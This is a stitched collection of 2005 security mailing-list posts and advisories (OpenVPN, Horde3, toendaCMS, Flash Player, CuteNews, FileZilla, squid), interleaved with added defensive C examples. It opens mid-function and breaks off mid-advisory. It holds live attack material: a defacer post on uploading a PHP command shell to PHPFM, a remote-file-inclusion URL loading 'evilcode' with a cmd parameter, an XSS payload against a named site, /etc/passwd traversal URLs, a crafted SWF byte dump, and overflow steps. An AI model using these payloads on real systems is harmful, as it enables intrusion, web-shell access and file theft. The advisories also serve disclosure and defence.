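    umask(old);
    if (fp == NULL) { scratch_cleanup(dir, file); return -1; }

    fputs(SECRET, fp);
    fflush(fp);                               /* secret is now on disk */

    struct stat st;                           /* this is the race window */
    int exposed = stat(file, &st) == 0 ? (int)(st.st_mode & 0777) : -1;

    fchmod(fileno(fp), 0600);                 /* too late to matter */
    fclose(fp);
    scratch_cleanup(dir, file);
    return exposed;
}

/* Fixed pattern. O_CREAT|O_EXCL with mode 0600 makes the file private from
 * the instant it exists and refuses a pre-planted file or symlink. Returns
 * the permission bits observed right after creation, before any data is
 * written. -1 on error. */
int private_mode_with_umask(mode_t mask)
{
    char dir[64], file[128];
    if (scratch_path(dir, sizeof dir, file, sizeof file) != 0)
        return -1;

    mode_t old = umask(mask);
    int fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    umask(old);
    if (fd < 0) { scratch_cleanup(dir, file); return -1; }

    struct stat st;
    int at_create = fstat(fd, &st) == 0 ? (int)(st.st_mode & 0777) : -1;
    if (write(fd, SECRET, strlen(SECRET)) != (ssize_t)strlen(SECRET))
        at_create = -1;
    close(fd);
    scratch_cleanup(dir, file);
    return at_create;
}

int main(void)
{
    printf("fopen + chmod, umask 022:              %04o\n", racy_mode_with_umask(022));
    printf("fopen + chmod, umask 077 (workaround): %04o\n", racy_mode_with_umask(077));
    printf("open(O_CREAT|O_EXCL, 0600), umask 022: %04o\n", private_mode_with_umask(022));
    return 0;
}
```

The 077 case shows why the GLSA workaround is sound: with that umask even the racy sequence never produces a readable file. The fixed form does not depend on the caller's umask at all, which is the property you want from a tool that writes credentials.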
upload phpshell in PHPFM
upload phpshell in PHPFM
discovered by rUnViRuS
www.worlddefacers.net
www.security-arab.com
=-=-=-=-=-=-=-=-=
the shell code :-
---
> save as > cmd.php
now upload in PHPFM
=-=-=-= Used Shell =-=-=-=
www.site.com/[file upload name]/[files]/cmd.php?cmd=[linux command]
=-=-=-==-=-=-==-=-=-==-=-=-==-=-=-==-=-=-=
[ GLSA 200511-07 ] OpenVPN: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200511-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenVPN: Multiple vulnerabilities
      Date: November 06, 2005
      Bugs: #16
        ID: 200511-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The OpenVPN client is potentially vulnerable to the execution of
arbitrary code and the OpenVPN server is vulnerable to a Denial of
Service issue.

Background
==========

OpenVPN is a multi-platform, full-featured SSL VPN solution.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/openvpn          < 2.0.4                         >= 2.0.4

Description
===========

The OpenVPN client contains a format string bug in the handling of the
foreign_option in options.c. Furthermore, when the OpenVPN server runs
in TCP mode, it may dereference a NULL pointer under specific error
conditions.

Impact
======

A remote attacker could set up a malicious OpenVPN server and trick the
user into connecting to it, potentially executing arbitrary code on the
client's computer. A remote attacker could also exploit the NULL
dereference issue by sending specific packets to an OpenVPN server
running in TCP mode, resulting in a Denial of Service condition.

Workaround
==========

Do not use "pull" or "client" options in the OpenVPN client
configuration file, and use UDP mode for the OpenVPN server.

Resolution
==========

All OpenVPN users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/openvpn-2.0.4"

References
==========

  [ 1 ] CVE-2005-3393
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3393
  [ 2 ] CVE-2005-3409
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3409
  [ 3 ] OpenVPN changelog
        http://openvpn.net/changelog.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
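The client-side bug class named in the description, as an added example in C (not OpenVPN's code): text received from the peer is handed to a printf-family function as the format string instead of as an argument. The hardened function below pins the format to a literal, so conversion directives in the peer text are copied rather than interpreted, and a small guard counts directives in peer-supplied text so a parser can drop such input before it reaches any logger. The "dhcp-option" wording and the hostile sample string are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not OpenVPN's code. */

/* Hardened shape: the format is a literal and the peer text is data, so
 * "%x", "%n" and friends inside `opt` are copied, not interpreted.
 * The buggy shape it replaces is
 *     snprintf(out, outlen, opt);
 * which, with `opt` under peer control, reads the stack through "%x"
 * and writes to memory through "%n". */
int format_option_line(char *out, size_t outlen, const char *opt)
{
    return snprintf(out, outlen, "dhcp-option received: %s", opt);
}

/* Counts conversion directives in peer text: every '%' that is not the
 * literal escape "%%". A non-zero count in a pushed option is a strong
 * sign of an attack and a reason to reject the option at parse time,
 * before it can reach any code path that still formats it directly. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Shows that hostile directives survive as plain text through the
 * hardened path. Returns 1 if the output is byte-for-byte as expected. */
int directives_are_inert(void)
{
    static char out[128];
    const char *hostile = "DNS %x%x%x%n";          /* constructed input */
    format_option_line(out, sizeof out, hostile);
    return strcmp(out, "dhcp-option received: DNS %x%x%x%n") == 0;
}

int main(void)
{
    printf("hostile directives inert through \"%%s\": %d\n", directives_are_inert());
    printf("directives in sample: %d\n", count_format_directives("DNS %x%x%x%n"));
    return 0;
}
```

Compiling with -Wformat-security flags the buggy shape wherever a non-literal format is passed without arguments; the guard is for the case where text must be accepted and logged anyway, and decides before the formatter is reached.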
Re: [Full-disclosure] Re: readdir_r considered harmful
On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote:

> > Then you never really understood the implementation, seems. Of course
> > all implementations keep the content of the directory as read with
> > getdents or so in the DIR descriptor. But it is usually not the case
> > that the whole content fits into the buffer allocated. One could, of
> > course, resize the buffer to fit the content of the directory read,
> > even if this means reserving hundreds or thousands of kBs. But this
> > is not how most implementations work.
>
> I don't see how that is relevant; the typical use of readdir() is as
> follows:
>
>     DIR *dirp = opendir(name);
>     while ((dent = readdir(dirp)) != NULL) {
>         ...
>     }
>     closedir(dirp);
>
> Nothing other threads do with readdir() on different dirp's will
> influence what "dent" points to. I have *never* seen a program where
> multiple threads read from a single dirp; and I can't imagine the use.

In practice, you're correct. In theory, however, consider the following
code path.

    THREAD 1                          THREAD 2
    --------                          --------
    DIR *d1 = opendir(dir1);          DIR *d2 = opendir(dir2);
    dent1 = readdir(d1);              dent2 = readdir(d2);
    use(dent1);

In most implementations, dent1 != dent2. HOWEVER, there is no guarantee
that they will not both point to the same statically allocated buffer,
and some implementations may do so. For example, this is why ctime_r
exists: ctime returns a pointer to a statically allocated buffer, and
hence is not thread safe.

You are correct, though, that the glibc implementation of readdir is
thread-safe, so readdir_r is unnecessary in all common situations.
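The two claims in this exchange can be checked directly: whether readdir() results for two different DIR objects share a buffer, and whether ctime() results do. The program below is an added example, not code from any participant in the thread; it assumes a glibc-style libc (the behaviour the reply describes) and that the directories "." and ".." exist in the working directory.

```c
#include <dirent.h>
#include <stddef.h>
#include <time.h>

/* The plain readdir() loop from the thread, wrapped in a function. The entry
 * readdir() returns lives in the DIR object, so walking two different DIR*
 * from two threads does not clobber either walker's entries in glibc.
 * Returns the number of entries, or -1 if the directory cannot be opened. */
int count_entries(const char *path)
{
    DIR *dirp = opendir(path);
    if (dirp == NULL)
        return -1;
    int n = 0;
    struct dirent *dent;
    while ((dent = readdir(dirp)) != NULL)
        n++;
    closedir(dirp);
    return n;
}

/* The THREAD 1 / THREAD 2 table from the reply, run sequentially: two DIR
 * objects, one readdir() each. With per-DIR buffers the two pointers differ.
 * Returns 1 when they differ, 0 when they alias, -1 on open failure. */
int readdir_buffers_distinct(const char *a, const char *b)
{
    DIR *d1 = opendir(a);
    DIR *d2 = opendir(b);
    if (d1 == NULL || d2 == NULL) {
        if (d1) closedir(d1);
        if (d2) closedir(d2);
        return -1;
    }
    struct dirent *dent1 = readdir(d1);
    struct dirent *dent2 = readdir(d2);
    int distinct = (dent1 != NULL && dent2 != NULL && dent1 != dent2);
    closedir(d1);
    closedir(d2);
    return distinct;
}

/* ctime() is the static-buffer case the reply contrasts with: every call
 * hands back the same buffer, so a second caller silently overwrites what
 * the first one still holds. Returns 1 when both calls return one pointer. */
int ctime_shares_buffer(void)
{
    time_t t0 = 0, t1 = 86400;
    const char *a = ctime(&t0);
    const char *b = ctime(&t1);
    return a == b;
}
```

The readdir_r() and ctime_r() variants differ from their plain forms only in that the caller supplies the result buffer; on an implementation where the plain form already returns per-object storage, as shown here for readdir(), the _r form buys nothing, which is the reply's closing point.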
XSS vulnerability in names.co.uk framed hosting
names.co.uk is an English registrar and web hosting company. Their frames-based hosting option has an XSS vulnerability allowing injection of arbitrary Javascript. For example: http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert%281%29%22%20 According to webhosting.info, names.co.uk hosts 75k domains. If even a few percent are using the frames-based hosting option, then this vulnerability would affect thousands of sites. This vulnerability was reported twice to names.co.uk in early September 2005 (ticket SU197304). Their response was that it was not a security risk.
[SECURITY] [DSA 884-1] New Horde3 packages fix insecure default installation
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 884-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 7th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : horde3
Vulnerability  : design error
Problem type   : remote
Debian-specific: yes
CVE ID         : CVE-2005-3344
Debian Bugs    : 332290 332289

Mike O'Connor discovered that the default installation of Horde3 on
Debian includes an administrator account without a password. Already
configured installations will not be altered by this update.

The old stable distribution (woody) does not contain horde3 packages.

For the stable distribution (sarge) this problem has been fixed in
version 3.0.4-4sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 3.0.5-2

We recommend that you verify your horde3 admin account if you have
installed Horde3.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.dsc
      Size/MD5 checksum:      627 cc9b46f4b5a4f4a514ecbc51d9eb3a58
    http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.diff.gz
      Size/MD5 checksum:     6751 b0e7fb95efe86aeb42cfd0b478dd312b
    http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4.orig.tar.gz
      Size/MD5 checksum:  3378143 e2221d409ba1c8841ce4ecee981d7b61

  Architecture independent components:

    http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1_all.deb
      Size/MD5 checksum:  3432038 671d10d028345c0cfc133cc0504a2d50

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDbxYnW5ql+IAeqTIRAp50AKCu2u8rU/MHoFT+vgl7mRFrEGp8kACgtEBh
NQhwCmoAsCjYCSlFbpsYcrU=
=uGyV
-END PGP SIGNATURE-
SEC Consult SA-20051107-0 :: toendaCMS multiple vulnerabilities
SEC-CONSULT Security Advisory 20051107-0
========================================

              title: toendaCMS multiple vulnerabilities
            program: toendaCMS
 vulnerable version: <0.6.2
           homepage: www.toenda.com
              found: 2005-10-25
                 by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com
========================================

Vendor description:
---

The toendaCMS Content Management and Weblogging tool gives you a modern,
professional publishing system, based on an SQL and/or XML database.

Vulnerability overview:
---

toendaCMS contains various security flaws. These include:

 * theft of CMS usernames and passwords (XML database mode)
 * session theft (XML database mode)
 * directory traversal / reading of arbitrary files (XML database mode)
 * arbitrary file uploads

Vulnerability details:
---

1) Account data is stored within the webroot (XML mode):

   http://tcms.webserver.com/data/tcms_user/.xml, where is string
   composed of 5 bytes (e.g. 2ac336ff0d.xml). Each XML file contains the
   username (base64) and password (MD5) of a single user. This is
   particularly dangerous if the webserver allows directory listing.

2) Session data is stored within the webroot:

   http://tcms.webserver.com/engine/admin/.xml (XML mode).

   The session files are created once a user logs in to the CMS, so we
   just have to monitor this directory to steal his credentials. This is
   particularly dangerous if the webserver allows directory listing.

3) Directory Traversal / reading of arbitrary files (XML mode):

   http://tcms.webserver.com/engine/admin/admin.php?id_user=
   ../../../../../../etc/passwd

4) Arbitrary file uploads:

   Once we have gained access to the administrator interface, we can use
   the gallery scripts to upload arbitrary files to:

   http://tcms.webserver.com/data/images/albums/

   No content-type or file validation checks are in place, so this is
   the easiest way to get shell access.

Additional Remarks:
---

These flaws were found during a pentest, in an environment with
MAGIC_QUOTES_GPC activated. Please do NOT try to use toendaCMS without
MAGIC_QUOTES and other safeguards, unless you plan to run a honeypot or
have another particular reason for being very vulnerable.

Vendor status:
---

vendor notified: 2005-10-26
vendor response: 2005-10-30
patch available: 2005-11-01

The issues described in this advisory have been addressed in the latest
version of toendaCMS (0.6.2 stable). Download at:

http://www.toenda.com/de/data/files/Software/toendaCMS_Version_0.6.0_Stable/toendaCMS_0.6.2_Stable.zip

General remarks
---

We would like to apologize in advance for potential nonconformities
and/or known issues.

~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2005
bmu at sec-consult dot com
SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption
SEC-CONSULT Security Advisory 20051107-1
========================================

              title: Macromedia Flash Player ActionDefineFunction Memory Corruption
            program: Macromedia Flash Plugin
 vulnerable version: flash.ocx v7.0.19.0 and earlier
                     libflashplayer.so before 7.0.25.0
           homepage: www.macromedia.com
              found: 2005-06-27
                 by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com
========================================

Vendor description:
---

Macromedia Flash Player is the high performance, lightweight, highly
expressive client runtime that delivers powerful and consistent user
experiences across major operating systems, browsers, mobile phones and
devices.

Vulnerability:
---

ActionScript is an ECMAScript-based programming language used for
controlling Macromedia Flash movies and applications. In SWF files,
ActionScript commands are represented by DoAction tags embedded in
frames. SEC Consult has found that parameters to ActionDefineFunction
(ACTIONRECORD 0x9b) are not properly sanitized. Loading a specially
crafted SWF leads to an improper memory access condition which can be
used to crash Flash Player or may be exploited as a vector for code
execution.

This issue is similar to CAN-2005-2628 (as reported by eEye Digital
Security on November 4, 2005) but affects a different function.
Coincidentally, Macromedia received our notification of this bug on the
same day (June 27).

Proof of Concept:
---

A "malicious" flash movie dump:

- [SetBackgroundColor] - TagID: 9 (size: 3 (short tag)
  - dump ->: \x43\x02\xff\x00\x00

- [DoAction] - TagID: 12 (size: 60 (short tag)
  - dump ->: \x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00
             \x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43
             \x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45
             \x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00

- [ShowFrame] - TagID: 1 (size: 0 (short tag)
  - dump ->: \x40\x00

- [End] - TagID: 0 (size: 0 (short tag)
  - dump ->: \x00\x00

Recommended Fix:
---

The issue has been addressed in MPSB05-07. Upgrade to the newest version
of Flash Player 7 or to Flash Player 8.

Link: http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html

Vendor status:
---

vendor notified: 2005-06
fixed: 2005-09

General remarks
---

We would like to apologize in advance for potential nonconformities
and/or known issues.

~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2005
bmu at sec-consult dot com
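The dump above is readable by hand: each tag starts with a 16-bit RECORDHEADER (tag code in the top 10 bits, length in the low 6), and inside the DoAction body the record \x9b\x08\x00 announces an ActionDefineFunction of declared length 8, yet the function name alone ("AAAAAAAA" plus its terminator) is 9 bytes and the NumParams field (\x40\x00) announces 64 parameter names where only five follow. A reader that trusts those declared lengths reads past the record. The program below is an added example, not Macromedia's or SEC Consult's code: a bounds-checking walker for exactly these two structures that rejects the dump's DefineFunction record and accepts a well-formed one. The byte stream is reconstructed from the printed dump; the field layout of ActionDefineFunction (name, NumParams, names, CodeSize) follows the SWF format as the code comments describe.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint32_t rd16(const uint8_t *p) { return p[0] | (p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (rd16(p + 2) << 16); }

/* Walks the SWF tag list. Each RECORDHEADER is a little-endian u16: tag code in
 * the top 10 bits, length in the low 6 (0x3f means a u32 length follows).
 * Fills codes[] and returns the tag count up to and including End (code 0),
 * or -1 if a header or a declared length runs past the bytes present. */
int walk_tags(const uint8_t *buf, size_t len, int *codes, size_t max_tags)
{
    size_t pos = 0, n = 0;
    while (n < max_tags) {
        if (len - pos < 2) return -1;
        uint32_t hdr = rd16(buf + pos); pos += 2;
        size_t tlen = hdr & 0x3f;
        if (tlen == 0x3f) {                       /* long form */
            if (len - pos < 4) return -1;
            tlen = rd32(buf + pos); pos += 4;
        }
        if (tlen > len - pos) return -1;          /* declared length overruns */
        codes[n++] = (int)(hdr >> 6);
        pos += tlen;
        if (codes[n - 1] == 0) return (int)n;     /* End tag */
    }
    return -1;
}

/* Checks one ActionDefineFunction record of declared length alen: FunctionName
 * (NUL-terminated), NumParams u16, NumParams more names, CodeSize u16. Every
 * field must lie inside alen. Returns CodeSize, or -1 on any overrun. */
static long check_define_function(const uint8_t *p, size_t alen)
{
    const uint8_t *nul = memchr(p, 0, alen);
    if (nul == NULL) return -1;                   /* name not terminated in record */
    size_t pos = (size_t)(nul - p) + 1;
    if (alen - pos < 2) return -1;
    uint32_t nparams = rd16(p + pos); pos += 2;
    for (uint32_t i = 0; i < nparams; i++) {      /* more names declared than present? */
        if (pos >= alen || (nul = memchr(p + pos, 0, alen - pos)) == NULL) return -1;
        pos = (size_t)(nul - p) + 1;
    }
    return alen - pos < 2 ? -1 : (long)rd16(p + pos);
}

/* Walks a DoAction body. Returns 1 when every action record, and the code
 * block each DefineFunction announces, fits in the body; 0 otherwise. */
int validate_doaction(const uint8_t *body, size_t len)
{
    size_t pos = 0;
    while (pos < len) {
        uint8_t code = body[pos++];
        if (code == 0x00) return 1;               /* ActionEnd */
        if (code < 0x80) continue;                /* short action, no payload */
        if (len - pos < 2) return 0;
        size_t alen = rd16(body + pos); pos += 2;
        if (alen > len - pos) return 0;
        if (code == 0x9b) {
            long codesize = check_define_function(body + pos, alen);
            if (codesize < 0) return 0;
            pos += alen;
            if ((size_t)codesize > len - pos) return 0;
            pos += (size_t)codesize;
        } else {
            pos += alen;
        }
    }
    return 0;                                     /* body ran out before ActionEnd */
}

/* Rebuilds the four tags of the advisory's dump (constructed here from the
 * printed bytes) into out, which needs 71 bytes. Returns the length. */
size_t build_sample_stream(uint8_t *out)
{
    size_t n = 0;
    const uint8_t bg[] = {0x43, 0x02, 0xff, 0x00, 0x00};   /* SetBackgroundColor */
    memcpy(out + n, bg, sizeof bg); n += sizeof bg;
    const uint8_t act[] = {0x3c, 0x03, 0x9b, 0x08, 0x00};  /* DoAction; DefineFunction, len 8 */
    memcpy(out + n, act, sizeof act); n += sizeof act;
    for (char c = 'A'; c <= 'F'; c++) {                     /* six NUL-terminated names */
        memset(out + n, c, 8); n += 8;
        out[n++] = 0x00;
        if (c == 'A') { out[n++] = 0x40; out[n++] = 0x00; } /* NumParams = 64 */
    }
    out[n++] = 0x00;                                        /* ActionEnd */
    const uint8_t tail[] = {0x40, 0x00, 0x00, 0x00};        /* ShowFrame, End */
    memcpy(out + n, tail, sizeof tail); n += sizeof tail;
    return n;
}
```

The tag-level walk passes on the dump (four tags, codes 9, 12, 1, 0, every length inside the buffer), which is why a player can reach the action records at all; the rejection happens one layer down, where the declared record length of 8 cannot even hold the function name. Checking each declared size against the bytes that remain, at every nesting level, is the whole of the fix.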
Path disclosure in CuteNews <= 1.4.0
A remote user can supply a specially crafted URL to cause the system to
display an error message that discloses the installation path and other
data. The bug exists in "index.php".

Example:

http://victim.com/index.php?subaction=showfull&id=1128227686&archive=../../../../../../etc/passwd%00&start_from=&ucat=1&

Error:

Warning: file(/storage/bg/myst/www/irc/cutenews/data/archives/../../../../../../../../../etc/passwd\0.news.arch): failed to open stream: No such file or directory in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 268

Warning: Invalid argument supplied for foreach() in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 270

Can not find an article with id: 1128227686

---
Solution: Upgrade to version 1.4.1
---

Original advisory: http://www.securityinfo.ru/2005/11/cutenews_140.html
http://www.securityinfo.ru
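Both this CuteNews report and item 3 of the toendaCMS advisory above come down to the same defect: a request parameter is joined onto a fixed directory and opened, so "../" components walk out of that directory, and in the CuteNews case the %00 byte ends the C-level path before the ".news.arch" suffix is ever appended (the error message shows the \0 sitting in the middle of the path). The checker below is an added example, not code from either product; it assumes a base directory name and the ".news.arch" suffix taken from the error message, and it accepts only a simple relative name whose components are neither empty, ".", nor "..", looking at the raw bytes so that an embedded NUL is visible.

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if the len bytes at buf form a name that stays inside the base
 * directory once joined onto it, 0 otherwise. The length is passed separately
 * so an embedded NUL (the %00 trick) is seen rather than silently ending the
 * string. */
int is_confined_name(const char *buf, size_t len)
{
    if (len == 0 || len > 255)
        return 0;
    if (memchr(buf, '\0', len) != NULL)              /* embedded NUL truncates later */
        return 0;
    if (buf[0] == '/' || memchr(buf, '\\', len) != NULL) /* absolute, or Windows separator */
        return 0;
    size_t start = 0;                                /* walk '/'-separated components */
    for (size_t i = 0; i <= len; i++) {
        if (i == len || buf[i] == '/') {
            size_t clen = i - start;
            if (clen == 0)                           /* "a//b" or a trailing slash */
                return 0;
            if (clen == 1 && buf[start] == '.')
                return 0;
            if (clen == 2 && buf[start] == '.' && buf[start + 1] == '.')
                return 0;
            start = i + 1;
        }
    }
    return 1;
}

/* Joins base + "/" + name + suffix into out only after the name passes the
 * check above, mirroring the ".news.arch" suffixing in the error message.
 * Returns the resulting length, or -1 if the name is rejected or out is too
 * small. */
int build_archive_path(char *out, size_t outsz, const char *base,
                       const char *name, size_t namelen, const char *suffix)
{
    if (!is_confined_name(name, namelen))
        return -1;
    size_t blen = strlen(base), slen = strlen(suffix);
    if (blen + 1 + namelen + slen + 1 > outsz)
        return -1;
    size_t pos = 0;
    memcpy(out + pos, base, blen);   pos += blen;
    out[pos++] = '/';
    memcpy(out + pos, name, namelen); pos += namelen;
    memcpy(out + pos, suffix, slen); pos += slen;
    out[pos] = '\0';
    return (int)pos;
}

/* Builds the archive path for name under "data/archives" (the directory in
 * the error message) and reports whether it equals expected: 1 yes, 0 no or
 * rejected. */
int archive_path_matches(const char *name, size_t namelen, const char *expected)
{
    char out[512];
    if (build_archive_path(out, sizeof out, "data/archives", name, namelen, ".news.arch") < 0)
        return 0;
    return strcmp(out, expected) == 0;
}
```

Rejecting rather than "cleaning" the input is deliberate: stripping "../" sequences leaves "....//" style inputs behind, which is the kind of sanitizer failure the GNUMP3d advisory further down describes, and the id in this report is a plain numeric value for which a strict allow-list is the natural check.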
OSTE v1.0 Remote Command Execution
This is a toplist script.

Web Site : http://oste.nerdie.org [site closed]
Version  : Only 1.0 anyway there is a piece :)

Code :

http://www.site.com/index.php?page=http://evilcode?&cmd=
or
www.site.com/?site=evilcode?&cmd=

Google look for : OSTE v1.0 © 2003 Tyler Hall

Thanks all Kurdish Hackers and friends
Freedom For Ocalan!
Work in Progress: FileZilla Server Terminal V0.9.4d Buffer Overflow
** Inge Henriksen Security Advisory [EMAIL PROTECTED] **

I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d.
The exploit is still to be considered a work in progress as it is still
not clear to me why the exploit works on some systems and not others.
Please let me know if you manage to reproduce the exploit and perhaps we
can figure out the differences.

Stable Exploit Test System
--------------------------
Microsoft Windows XP Professional Service Pack 2 (Build 2600)

Technical Description
---------------------
The FileZilla Server has a user interface that is used to configure and
monitor the FileZilla Server. By sending a long USER ftp command to the
FileZilla Server a successful attack may crash the FileZilla Server
Terminal process. Note that the FileZilla Server itself does not crash.

Proof of Concept
----------------
The bug is somewhat difficult to exploit. On the stable exploit test
system I have understood that the following steps will crash the
FileZilla Server Terminal process:

1. Start the FileZilla Server
2. Start the FileZilla Server Terminal and login to the FileZilla Server
   started in step 1
3. Send the following USER commands; "USER A", "USER AA", "USER AAA"
   etc., incrementing by one letter ("A") in the command.

The FileZilla Server Terminal usually crashes after about 900-3000 "A"s.
The rpt file says the following:

System details:
---
Operating System: Microsoft Windows XP Professional Service Pack 2 (Build 2600)
Processor Information: Vendor: GenuineIntel ,Speed: 1728MHz ,Type: Intel Pentium compatible,Number Of Processors: 1 ,Architecture: Intel ,Level: Pentium II/Pro,Stepping: 33-36
Memory Information: Memory Used 69%, Total Physical Memory 769328KB, Physical Memory Available 233460KB, Total Virtual Memory 2097024KB, Available Virtual Memory 2061140KB, Working Set Min : 200KB Max : 1380KB .

Exception Details:
--
Exception code: C005 ACCESS_VIOLATION
Fault address: 7C910F29 01:FF29 C:\WINDOWS\system32\ntdll.dll

Call stack:
---
Address  Frame    Function      SourceFile
7C910F29 0012FA9C 0001:FF29     C:\WINDOWS\system32\ntdll.dll
7C910D5C 0012FB70 0001:FD5C     C:\WINDOWS\system32\ntdll.dll
00438A1A 0012FBAC 0001:00037A1A C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
00405049 0012FBD4 0001:4049     C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
0040562C 0012FC00 0001:462C     C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
77D38734 0012FC2C 0001:7734     C:\WINDOWS\system32\USER32.dll
77D38816 0012FC94 0001:7816     C:\WINDOWS\system32\USER32.dll
77D3C63F 0012FCC4 0001:B63F     C:\WINDOWS\system32\USER32.dll
77D3E905 0012FCE4 0001:D905     C:\WINDOWS\system32\USER32.dll
0045F924 0012FD58 0001:0005E924 C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
77D38734 0012FD84 0001:7734     C:\WINDOWS\system32\USER32.dll
77D38816 0012FDEC 0001:7816     C:\WINDOWS\system32\USER32.dll
77D389CD 0012FE4C 0001:79CD     C:\WINDOWS\system32\USER32.dll
77D396C7 0012FE5C 0001:86C7     C:\WINDOWS\system32\USER32.dll
[SECURITY] [DSA 809-3] New squid packages fix regression
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 809-3                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 7th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : squid
Vulnerability  : assertion error
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2794
Debian Bug     : 320035

Kosa Attila discovered that the security update DSA 809-2 contained a
regression in the packages for the old stable distribution (woody). The
original advisory text follows:

Certain aborted requests that trigger an assertion in squid, the popular
WWW proxy cache, may allow remote attackers to cause a denial of
service. This update also fixes a regression caused by DSA 751.

For the oldstable distribution (woody) this problem has been fixed in
version 2.4.6-2woody11.

We recommend that you upgrade your squid package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11.dsc
      Size/MD5 checksum:      614 341d5ba1daa6d5b4c997096a4116c782
    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11.diff.gz
      Size/MD5 checksum:   257997 65e0a384bde2fdb61d215b86b421b1be
    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6.orig.tar.gz
      Size/MD5 checksum:  1081920 59ce2c58da189626d77e27b9702ca228

  Alpha architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_alpha.deb
      Size/MD5 checksum:   817194 c9b35cf30db2598f1fe8c5a4b5d842dd
